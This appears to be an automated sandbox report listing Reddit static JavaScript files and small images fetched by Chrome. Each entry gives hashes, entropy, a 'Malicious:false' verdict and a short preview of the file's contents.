                                                  Preview:import{L as t,hk as e,dz as s,K as o,O as a,b as n,hl as i,r,hm as d,hn as c,c as l,T as p}from"./shell-4994f581.js";import{g as h,r as u}from"./icon-4d9be652.js";var m;!function(t){t.Small="sm",t.Medium="md"}(m||(m={}));const y=t=>{let e;return"boolean"==typeof t&&(e=t?"true":"false"),e},g=t=>{const{attributes:e,trailingSlot:s,selected:o,liRole:a}=t,{html:n,createElement:i}=h(),{role:r,tabindex:d,"aria-disabled":c,"aria-selected":l,...p}=e||{},u=n`${b(t)} ${P(s)}`;return i("li",{...p,className:`relative list-none mt-0 ${e?.className||""}`,rpl:!0,rplSelected:o,role:a||"presentation"},u)},b=t=>{const{anchorAttributes:e,appearance:s,description:o,disabled:a,href:n,innerClassName_DO_NOT_USE:i,label:r,leadingAvatar:d,leadingIcon:c,noXPadding:l=!1,onClick:p,selected:u,size:g=m.Medium,trailingSlot:b,attributes:P,suppressHoverStyles:I=!1}=t,$=!u&&t.hasTransparentBackground,{html:A,createElement:v,ifDefined:S}=h(),{role:w,tabindex:N}=P??{},k=Boolean(N??P?.onclick??t.onClick),T=k?parseInt(N??"0
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):2793
                                                  Entropy (8bit):7.921956391611798
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D623C2B06142A5E53915E77AEEF0431C
                                                  SHA1:1FB819A89C96A69DE26B6B2FFB9B438C954B3AA9
                                                  SHA-256:1AB098AC57640E9669F5813494288EB3A2A44A06965846EE917B5BD7B5CEAB5A
                                                  SHA-512:446D00F3DAE52EA6591A17780C69B203C49579B7B6A5D9A362A2697F154B1E04B0D2CB9720AC3B134D4C0BDF3D89713AD98B66068C24C94BC12E306C8E8DBDB5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...0...0.....`.......PLTE..................MNN.zS ! ...............UUU....jii[[[..............@@@...000SSS...$$$......^_`-....336.?....III............uvu.......K............].......\]^.c4...FFFnoneee.H..q......xzz.999..............................cdd`aa......bab............uuv(((....Q.YYY..........lll....................vww.@....|||CCC......yxx....W&&''.......W .........E.pqp.....................................::;rrrPPP...666=>?%%%.L.......!""EEF.........??>...........=........455lloqrsKKK...GGH......jkk.@..V#.R.....;.ggh../222.........TTT778..............xxzBBB......WWWQRR***...tst...OOO.........LMN.........rtv......A.......##"...333eff]^^~~~..........ooo...JJJ......vvxYZZ...\]\<==......___......hhh...mmmacd.....................+++...555...EED...efh....E..D...X....pHYs...t...t..f.x....IDATx.eU.X.....K.".e.H..P".N..&.....%S..M..PP.,i......1..."$..P...yeC\.F.}.+.F1V#..bPA.....~....f..........+....o6..W.V.d../.G&P.VKI...}$.f..X..,......A
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 48x48, components 3
                                                  Category:dropped
                                                  Size (bytes):1300
                                                  Entropy (8bit):7.623048977572648
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6E266EF5DE24ACB0A8ADE68F05FA8D0D
                                                  SHA1:A399F271A7D7A798D827030CD6B744272143021F
                                                  SHA-256:AE1893A74548E7EE581F95578F6BF4C727031208E0502974FC2EAEC4EA0A41A4
                                                  SHA-512:B16F906E820F2EDFFB29C227B3CC46220523BAA3E7D83E56F8798B6552998FF5565A3AAD2AD533DB47AF1FA652325A5E80DD614CD159CE824C7185552195B418
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......0.0.."........................................-...........................!..1a"$2AQb.q................................$.........................!1Q..A."q............?.m.kz.Z..6\.}eT...=...._E].d.u..].Y..X..@.-....H..E^lM.!umWU.....m....vM.,iV^T.0..c".2I...(..h...C.KO.t.l..b).AA......2...5.GB.-=.|..o}......I..$Q$...D..../.o.z...v...<.^............H..x..,h..:Y:Qb.7!...D.U^..q..bZ.T2.9.f3....W.0~.;......N....9..c_......0JE.5'e2.....e..Y..F...Rn........Z....>....O<bW.y.I....%.'.s...--&0G...(..gt.W.T)!GeW.g..\H..b'.o.."....S...........=....T.em-.Y..h..`^...N.4M..MY-_.k)-Q..D'z.|uDr..H.R;\..,..a..U.....'...;...,....._.z.EE..=...q...+'W2J..'.=.V.^.'v+W.....6......5T.+.0.5j.b=Jnh....i.n.d..?..p.$........Q.....u=.p......f.K!..m.h...O...l%..-.6..+'K....Rr`.+&N.r.dx.F.N...b..==SWTs(/...-4...^..8|..U1.k...Z.......j|........@.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):198
                                                  Entropy (8bit):5.226501209783138
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3CB0A758B65C6740AC5B1C80AB3183AC
                                                  SHA1:2BC20D16FA31D93E9EB0E0918EA0DFDEC37E5AD6
                                                  SHA-256:5CC628E55CD30A383FD388F559717666D301885DBA90BCEA26138AB78866C3F3
                                                  SHA-512:5C743BD9A1DDD6348EFAA87FEFD0D20AB99642D7AE0765332D60E167D043284660FCE9D01DD1924CB6A7DDA4E6186017F628EE13114378753F1BA819CC0BD1A5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/community-highlights-3e873ce7.js
                                                  Preview:import{P as e}from"./links-27a3f3ef.js";const o=new Set([e.SubredditFeed,e.CommentsPage,e.ModQueue,e.ModQueueAll,e.ModLog]);export{o as H};.//# sourceMappingURL=community-highlights-3e873ce7.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3399)
                                                  Category:downloaded
                                                  Size (bytes):3464
                                                  Entropy (8bit):5.195523842223338
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1634E0EE228D59A25E35BFB017E3A00C
                                                  SHA1:DFBF307AAD7A64F55C9A5B545B84732F4B3BA484
                                                  SHA-256:79B9866C65441A4AE5FDE2DCCBE6AE06DAA0396FACD7EDB6EE4EE6DF107D16FD
                                                  SHA-512:D280ACEAEA16A7A4E42E6643609997E9CCC7648B610241D50FE363F1A9C745C23D56C86496E48797904DFFE0F94F055C2F965293F0D094567B1538A09CBA423D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/previous-actions-client-js-b2badcb0.js
                                                  Preview:import{a as e,t,_ as o,n as r,g as a,b as d,u as i,e as s}from"./shell-4994f581.js";import{s as n,x as c,ay as l,I as u}from"./icon-4d9be652.js";import{l as p}from"./expandable-section-header-e3f969c2.js";import"./faceplate-dropdown-menu-f991e0ba.js";import"./subreddit-posting-eligibility-cf0ca862.js";import"./club-award-confirmation-client-js-b22d6f4f.js";const b=e(n);let m=class extends b{constructor(){super(...arguments),this.hasRemovalReasonAdded=!1,this._feedbackSubmitted=!1,this._trackingContext={}}get reportKey(){return`post-guidance-feedback-${this.reportId}`}getShredditPostData(){const e=this.getRootNode();if(e instanceof ShadowRoot){const t=e.host;if(t&&"SHREDDIT-POST"===t.tagName)return{id:t.id,postTitle:t.getAttribute("post-title"),contentHref:t.getAttribute("content-href"),authorId:t.getAttribute("author-id")}}return null}connectedCallback(){super.connectedCallback(),this._feedbackSubmitted="true"===sessionStorage.getItem(this.reportKey);const e=this.getShredditPostData();
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):964
                                                  Entropy (8bit):7.047147045632444
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:213B43D85FAC480D3A86DCCD39BB3261
                                                  SHA1:2CEE78A6EC534776D8D2C90731928E3DA4F07018
                                                  SHA-256:B06F86F8D5E8C506F53C1B0DE809E76CC0F0B94ECACCA1E882EA5E4FF2BB6C1A
                                                  SHA-512:FB3FBE4EEF06FF9E58A314D15EC21C3CAAD8B11F4736A3632AB5EB4016BAA331DDD517BA4386BCF8B632427385F64E78CE0FE47FB1C3857C099BA16BFF1EDA4F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...0...0.....`.......PLTE............1/.XT.*'....QM.KH....$#.a\.A?./.....JG.,*.......XU.gc.=;.42.SP.IF....[X.C@.mi.GE..........ea.`\.ok....WT.LJ.PM.@>.%#.}x.B@....TP.FC.NJ.ql.nj.<9.fb.gb..-.yu.LJ....ok.............<AHRR^QQY......]Z.TQ.... .." .......OL.QN.......NK.a].)(....WS....30.$".hc.IF.rm..........X^\{yuqqp..............................97.kg.DA.pk.FC.jf.{v.a].#".VR.RN.c_....b^.,*.d`.ZV.>;.$#....oj...NO.......ln.kv-+.......86.[W.%$.=4.K@..fsk=C?<.?=.MJ.1..64..z.up.YU. .......................OK...............................pHYs...#...#.x.?v...oIDATx.c`".0.j..0.a.500......6o...L\..f......4wNjV.....}Cc\|BbV..Sr2P...$....f....s..35....;8:9.....B.!........+:&.....................w....@`PpHhX8S.PCVD.W.7./.....1........UvNn.I>...&3M.:{....3...f1.........HHrJuJ3I........O+)-+.T..U.T\..r1.....2`..W.PT.WV.Q.W.V..!....g4c......~..&....a4..i.".YYs...0..^...t.2.,.e...s..b...x....HpN*D.*..W1..G5.j......sUE.......IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (500)
                                                  Category:downloaded
                                                  Size (bytes):564
                                                  Entropy (8bit):5.08930778128312
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B4D8F29236AA4D061E3BF84AFE641B99
                                                  SHA1:496BDAEA60183CE3F52344BDE86B8BA792E069D4
                                                  SHA-256:717F586B37970510A28DB802543A9D2114FAB536AF56B08E9B08EC0C19B65A55
                                                  SHA-512:707CC95E7800FA6DD317F1D34197EF5E785D191A407CF3123A972EFAEACFC7013A85A0376F0925CC4DFC053E585873B5CD35AFA68DCD7F9ED0961B5F0697DEE6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/user-hover-card-client-js-cc766b03.js
                                                  Preview:import"./faceplate-progress-9c742d06.js";import"./follow-button-6c9f957a.js";import"./all-chats-page-recommendations-client-js-e5594d8f.js";import"./click-location-tracker-32ee9eb3.js";import{g as o}from"./password-recovery-fa619c78.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./club-award-confirmation-client-js-b22d6f4f.js";o()&&(import("./achievements-entrypoint-49b76d04.js"),import("./mod-note-overflow-menu-e7de865b.js"),import("./mod-user-summary-feedback-58cfa2a4.js"));.//# sourceMappingURL=user-hover-card-client-js-cc766b03.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, progressive, precision 8, 640x791, components 3
                                                  Category:dropped
                                                  Size (bytes):33438
                                                  Entropy (8bit):7.958160812604923
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1B175073CFBE5D4F13AACAB0046F01C1
                                                  SHA1:5E5FACBA61176E59AEEEB325C9ADDA081C4CA681
                                                  SHA-256:5A4C77CCF8073AF08171A6228B95827D1AADC6ACE146CA3C438468D956CAB932
                                                  SHA-512:A8F3A3F99418D5813E2BDB14E2D2B3147EAD4D19B820F9DA2339785BF188531D63B809AFFDAD6DF2EAF42B01918FCB4D9A8A9F80D78C00B0980CDE5ACC292567
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}..........."...................................................................................[.O{.....|...-.x.W..-P.@J.....+.z. u....G~w..../.(.......H.....R..<..<.ms.Y.>7_.W..x..7..<._..y..A..N...Z1|..p.xzs....N...+....<.w/..N..B[.8.|OC.~c^Vd..C...z.....N2..j.-m...g.."...........k.....S.....<.<. .F]..j.WD........n.'.......,....x.2...^G..^.@.K..G..v.....,^...O;.b6..LY...k0.....1;.....O..../...s...<..=...%.h.V....o-....&..y.ro....GF....f.W&.\.&.G)S[........7vb.!.u...~{...5.e..F..0:lJ.X,fMJ._.\...5.YP.3^..[...~....r..O%.<.\?M.4.........3....M(....~.w.V^.ws.{....wy.....9L.y.S......>....a......sy....U.tK...YT.....td...,....)V...Kj~.SN.9<...</..s^Q.ud.g..Jy..#...+BOs.3..4...Kxo..K.....RV..7=}.W..8;......q.ma./.X...3.s.T..Zv...y..N...e.V]B...q..m...G./&....G.s}gv..~.[....W1..k.W.[++...9.. .....|.G..v=ko.-C.6
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (19595)
                                                  Category:downloaded
                                                  Size (bytes):19667
                                                  Entropy (8bit):5.2643782834009265
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:786426C810448A6EE93F98FD07AB6D69
                                                  SHA1:629D4DE264EA6D3D1F3C76A762B3CCC825722F5C
                                                  SHA-256:B81CB07DD657AAF0DEB233DD57033BC12D1B112B0628CAA76A18DB2934423ED2
                                                  SHA-512:746649C1BC35F23EFCC717B2A31765AD85F731EFFB35BEF3C72ED47C8045E4708D1D7DA310C8461C9B11EDD6E07C8B964C96FCAB6922F4B70BB0479540354FAD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-removal-reason-form-client-js-60fb2451.js
                                                  Preview:import{O as e,K as t,_ as s,g as a,n as o,t as i,e as n,l,L as r,u as d,v as c,N as m,E as p,H as u,af as h,c as v,T as b,gC as g,a as y,P as f,a6 as R,I}from"./shell-4994f581.js";import{x as S,a as x,g as E,j as w,s as C,c as M,I as k,D as N,aL as A,A as L}from"./icon-4d9be652.js";import{al as j,a2 as $}from"./club-award-confirmation-client-js-b22d6f4f.js";import{A as B,B as V,C as D}from"./modActions-7666e3bf.js";import{F as T}from"./faceplate-form-520b1141.js";import{c as q,r as F}from"./index-169ed00b.js";import{C as P}from"./comment-6e87a634.js";import{P as U}from"./overflow-menu-actions-fd509c7d.js";import{c as _}from"./links-27a3f3ef.js";import"./faceplate-select-text-input-a2370973.js";import"./faceplate-option-67bfebc3.js";import{F as z}from"./filterNullish-3e68f24c.js";import{R as O}from"./rpl-tooltip-958cc522.js";import"./chat-mobile-xpromo-client-js-58e17cee.js";import"./faceplate-textarea-input-ab5075d8.js";import{R as H}from"./smart-escalations-provider-client-js-e0225ba6
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):20165
                                                  Entropy (8bit):3.834252482949315
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A3AF07D8BA91239435D4FE6D6BAD0B49
                                                  SHA1:5FCACD57DB27F4DAD70EB587AF5EE86F8A03653E
                                                  SHA-256:961DD761D6B20E77C5E3BE00FD1A3D7C15945623A26D2AF80684E9C74113CAF8
                                                  SHA-512:6BF070332757EBC6D2F0827C9EBBF11B158E43EA061EEFC74E08C1AD4621673F7E4262F568F3811CF6BCAA9FE6B0AC20D0EC75062598050776E5023DAC267808
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...............?1....pHYs...#...#.x.?v..9.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015.5 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2017-12-05T12:38:51-06:00</xmp:CreateDate>. <xmp:MetadataDate>2017-12-05T12:38:51-06:00</xmp:MetadataDate>.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):8859
                                                  Entropy (8bit):7.961818111428277
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D86B8097334C26B01B71C468A1D867EB
                                                  SHA1:68AFDBAFDCEA0B8155E7AED862183D0012ED177E
                                                  SHA-256:62FD39E3F476BC900845064EB381E51CCD2282023A9215EA314E644A5E7D4B31
                                                  SHA-512:50D7F5085B4BD45639046171FE3E594E213E82E89FD6D8FCC28D837CB06DDCDB657EDCABC2F8000318925BAC063EC9CD0911696A4D54E2627A5EA71C18D77716
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR..............>a..."bIDATx..y|T......>...IX.."....P."^.Vk[......V[.........Y.bk.r..Z.......a...-..Lf&3g...?.. {2..<..^09s....|..?...m.+.U@.a:...@..@.._`. ....5....._....3..v. .$. 0ux..6.....j`.../...@M. ........Z..;.1..N...'......^..E..]]H.......4.H.....B ...G`....#.....K]q.....yq....l....m..+..... ..s..s.......K.xe...r.E...C2'.H.u`...........;@..../>......yQP.{.X.y.X6<Q,..n..0J.......|D...........`.6..}p.p.0..;...a....v.?.Lc.d........E.N.;.....rU.5.....18....8.....4...F.?,..0...v.+%..S8.X...v.z[j.-..o.....#......}..........].]....Ll...:'M. ..o)!...8.C..vS...X..J...R.=~......v...w......\.*.....q.q^.A1B).c...j.......I......Q........+.==..m.#..........),[.EW..k.`.D..\UY...k............2.zWW3zq.u...... .j..t...Mp.B.!..P.S.T...3B.....br&N.y.0..l.-.~..*@Wz..a.?....%..8.(.H...2.@=@.h.&.iL*.x..,....\.}<..^9n..nq..Y~.0fO2..)>>{..E.u[{..Y..+......L.q.....@G$%.+.:Vg.z....>.'.n.L.6.q....'...w.\/7]....Y<..1.tl..x...M.R...x5.....j.E.H.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (416)
                                                  Category:downloaded
                                                  Size (bytes):475
                                                  Entropy (8bit):5.084423288722371
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BD06B4213BDCC2E945588C6E948F2805
                                                  SHA1:4BD2894BA44793CCEFD227AF6EA025E5C9116D94
                                                  SHA-256:0A67B7A1AC9B13DE3757738F8DA2E2105372DAEF0CC2A333BB80D576AC90A360
                                                  SHA-512:3A9A48DC92D4BAD6FF76F5D9215396DE0B7F114F9A5D088C696720E91B22B4861A07B7ECE582754494B1FEBDD2CCE550BFBEABB06CA99022AECBB96D2A984D83
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/awardsTelemetryState-36bf2914.js
                                                  Preview:import{d as t,f as e}from"./shell-4994f581.js";var r,s;class o{static get instance(){return t(r,r,"f",s)||e(r,r,new r,"f",s),t(r,r,"f",s)}getCorrelationId(){return this._correlationId}setCorrelationId(){return this._correlationId=crypto.randomUUID(),this._correlationId}getPostType(){return this._postType}setPostType(t){return this._postType=t,this._postType}}r=o,s={value:void 0};const n=o.instance;export{n as a};.//# sourceMappingURL=awardsTelemetryState-36bf2914.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (648)
                                                  Category:downloaded
                                                  Size (bytes):709
                                                  Entropy (8bit):5.264590201112178
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5B88B5D9395D574725338096D49D83E2
                                                  SHA1:948DB5A7875CB2914CF4223F83151D77408D4CFE
                                                  SHA-256:A12F079099C38E44737083F40A0D5FBC1E81934C97E3F46B87AB409D8A68DA3A
                                                  SHA-512:4EBC858E642CFB98502749A2212CC898C70336886CF61A3E7F3D17C4DCA54F66DD191CCA2E1988C5646FB6EB88863D732EC2DACA7DF5139F6F3CB0EBBFA87504
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/click-location-tracker-32ee9eb3.js
                                                  Preview:import{a as t,t as c,_ as i,n as o,A as l,e as s}from"./shell-4994f581.js";import{t as a}from"./club-award-confirmation-client-js-b22d6f4f.js";import{s as n,x as e}from"./icon-4d9be652.js";const r=t(n);let k=class extends r{constructor(){super(...arguments),this.clickLocation=l.UNKNOWN}handleClick(t){"auxclick"===t.type&&1!==t.button||a({el:this,clickLocation:this.clickLocation})}render(){return e`<slot @click="${this.handleClick}" @contextmenu="${this.handleClick}" @auxclick="${this.handleClick}"></slot>`}};k.styles=[c],i([o({type:String,attribute:"click-location"})],k.prototype,"clickLocation",void 0),k=i([s("click-location-tracker")],k);.//# sourceMappingURL=click-location-tracker-32ee9eb3.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (621)
                                                  Category:downloaded
                                                  Size (bytes):666
                                                  Entropy (8bit):5.1092971242107845
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:93A5B4F258B8C54D7FA31EAF7C169491
                                                  SHA1:8940C0791288024B2736BD1933B0412EA7234FB6
                                                  SHA-256:1BAD54471B805B9B7A52DBF902199BC4BA885C96E8AF7C0AFFBF5DEACAD996B9
                                                  SHA-512:2EB14AEB753BA6B8C7D0003ABD88BA42F380C373DFE43E2E89C4CD66BCACB1312D87165AE48F0543413D5DA767E2641A4098839C9187D569A95241FEB8D6F565
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/awards-d066f3fe.js
                                                  Preview:var a,o,e;!function(a){a.GoldPurchasePaymentForm="award-gold-purchase-payment-form",a.GoldTopupPaymentForm="award-gold-topup-payment-form"}(a||(a={})),function(a){a.SelectionSheet="selection-sheet",a.Leaderboard="leaderboard",a.GoldPurchase="gold-purchase",a.GoldTopUp="gold-top-up",a.ClubAwardConfirmation="club-award-confirmation"}(o||(o={})),Object.values(o),function(a){a.Limited="award:limited",a.Free="award:free",a.Community="award:community",a.Highlighted="award:highlighted",a.Iconic="award:iconic",a.Mod="award:community_gold_manager",a.Subscriber="award:community_subscriber"}(e||(e={}));export{o as A,e as a};.//# sourceMappingURL=awards-d066f3fe.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (23356)
                                                  Category:downloaded
                                                  Size (bytes):23417
                                                  Entropy (8bit):5.235485123236965
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C743765D33C3DF845A78965184AFFF3F
                                                  SHA1:3AE65094E4154C66536B1A305BC7601CDF3E60E8
                                                  SHA-256:9CA0AA4DC2FF31BF5120F8AB796D42AFE3B2150B7156A87D3D5BB2062A73C543
                                                  SHA-512:70318BF4BFF62704763B7E29471383B361584BEA5E23F07E9A12C6B90630F8333D37F596F8F0785D509A18A42545ED65A85CF5B8164733A0FCEF54E3BFC5C713
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-actions-controller-3be29c73.js
                                                  Preview:import{x as t,l as e,ay as s,A as i,q as a,I as o,r as n}from"./icon-4d9be652.js";import{dn as r,p as h,T as d,c6 as l,b as c,fe as m,ff as p,fg as u,s as g,cY as v,Z as k,c as w,bO as f,r as _,u as b,v as y,aL as T,H as P,fh as C,K as S,O as R,fi as A,i as E,fj as I}from"./shell-4994f581.js";import{l as M}from"./expandable-section-header-e3f969c2.js";import{O as U}from"./chat-mobile-xpromo-client-js-58e17cee.js";import{A as x}from"./mod-removal-reason-form-client-js-60fb2451.js";import{t as H,m as N,u as $,r as D,w as O,x as j,y as L,z as q}from"./modActions-7666e3bf.js";import{i as B,g as F}from"./postFlair-1f8d3c96.js";import{S as z,M as W}from"./mod-bulk-actions-983b8f48.js";import{S as V}from"./comment-6e87a634.js";import{M as K,A as Y,d as Z}from"./distinguished-tags-28b29a34.js";import{S as G,b as J}from"./overflow-menu-actions-fd509c7d.js";import{D as Q}from"./club-award-confirmation-client-js-b22d6f4f.js";import"./select-controller-fa3db659.js";import"./faceplate-shimmer-252a0
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):357
                                                  Entropy (8bit):4.9937497939785835
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:EFBA26B1BBBEDB101E5A007870C622CA
                                                  SHA1:CB544F4A0D6A50A76164C47F18590C022C179C7D
                                                  SHA-256:4DBA4AA1815A238B755BAA8B1B8A393CF29C1DAA8332345914E500F6649C3ECD
                                                  SHA-512:BA5290099A12B23877D095831E80641C5FE7B9D128EA815D671FB4D36376BE9A4BBD89777EE3C594A9A2995CB73EB282614D2B61ACD11FD4C63F452E5680E5A6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/list-style-community-recommendations-client-js-8648402c.js
                                                  Preview:import"./community-card-aba01d4b.js";import"./show-more-grid-51791b3c.js";import"./shell-4994f581.js";import"./shop-gallery-data-fetcher-client-js-a66aa4d3.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./icon-4d9be652.js";import"./number-68db534b.js";.//# sourceMappingURL=list-style-community-recommendations-client-js-8648402c.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):347
                                                  Entropy (8bit):5.016087866985177
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CD222FF1F76BC2ABA1C0674D57304524
                                                  SHA1:876CD254234AD8859EABD91377A6D60F409F57B2
                                                  SHA-256:D2784A3442911F4C8FC03B975604C3D4C48BF6DD584286BCBF316E7C721FC2A2
                                                  SHA-512:ED963DF39532ADAC40C69798A5E2C9E3AC3D2D239709DE7EE01C8B9F632AABF111AF9C1A09E21D94A4A5DC66AC32320528275F6CD3414D07C61F8AAFD29F0721
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/hui-grid-client-js-38860f05.js
                                                  Preview:import"./flex-left-nav-container-c40bb411.js";import"./rpl-tooltip-958cc522.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./flex-nav-2ca2e7d8.js";import"./tooltip.base-aa9be46d.js";import"./rpl-popper-3f91bd17.js";.//# sourceMappingURL=hui-grid-client-js-38860f05.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (5028)
                                                  Category:downloaded
                                                  Size (bytes):5094
                                                  Entropy (8bit):5.312240146472053
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A010B59442D92EC6562B6B69819C9690
                                                  SHA1:B383EC1268039B371420127C661E9E68D604B74B
                                                  SHA-256:27ABC831F87588BACC9B91D79DCF65E6273B51199FEC86E153B660785D239009
                                                  SHA-512:7E8CA2AFE74D9BC2FB89005914CFFE809BF33C8A46EC106BEB41A64BB97234BB34453EA7674842C21BAC1937450D74F926D392CC5D87B007AC1982423E65E8E4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-post-overflow-menu-cfb336ae.js
                                                  Preview:import{u as e,v as t,bD as o,t as i,_ as s,n as r,e as a}from"./shell-4994f581.js";import"./faceplate-bottom-sheet-header-b31e0ad4.js";import"./app-selector-client-js-489f074c.js";import"./faceplate-dropdown-menu-f991e0ba.js";import"./select-controller-fa3db659.js";import"./feedback-tooltip-overflow-menu-cbfa9270.js";import{x as n,c as l,I as p,v as d,s as c}from"./icon-4d9be652.js";import{l as m,L as h}from"./expandable-section-header-e3f969c2.js";import{W as u,p as f}from"./with-post-actions-283c4a7a.js";import{J as b}from"./links-27a3f3ef.js";import"./index-56e4320e.js";import"./subreddit-posting-eligibility-cf0ca862.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./header-action-item-chat-client-js-98797a42.js";import"./rpl-tooltip-958cc522.js";import"./tooltip.base-aa9be46d.js";import"./rpl-popper-3f91bd17.js";import"./profile-creation-61d368d7.js";import"./with-share-687454db.js";import"./ui-strings-aad5fab2.js";import"./content-action-button-5fdf727f.js";impor
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2546)
                                                  Category:downloaded
                                                  Size (bytes):2596
                                                  Entropy (8bit):4.9039698383552475
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1D0DE5D0FD792586FC80A8AD7058C0A2
                                                  SHA1:A82B1C22B6DD960F5CCA5906171D417FB725E6CA
                                                  SHA-256:512A552F2CA9C59A0BEDB2304BDC57F6367D4AC88DE5F3744875F3DEA6177162
                                                  SHA-512:095C462FC9BA6FDE46BC8CC6C72F390C07DDE02D1C946A963E204F18316E3C4F2DADE54D2A62F7227903623BEE5F84A5E35E16757F818FCABFA2A1E01E56ACA1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/rpl-tooltip-958cc522.js
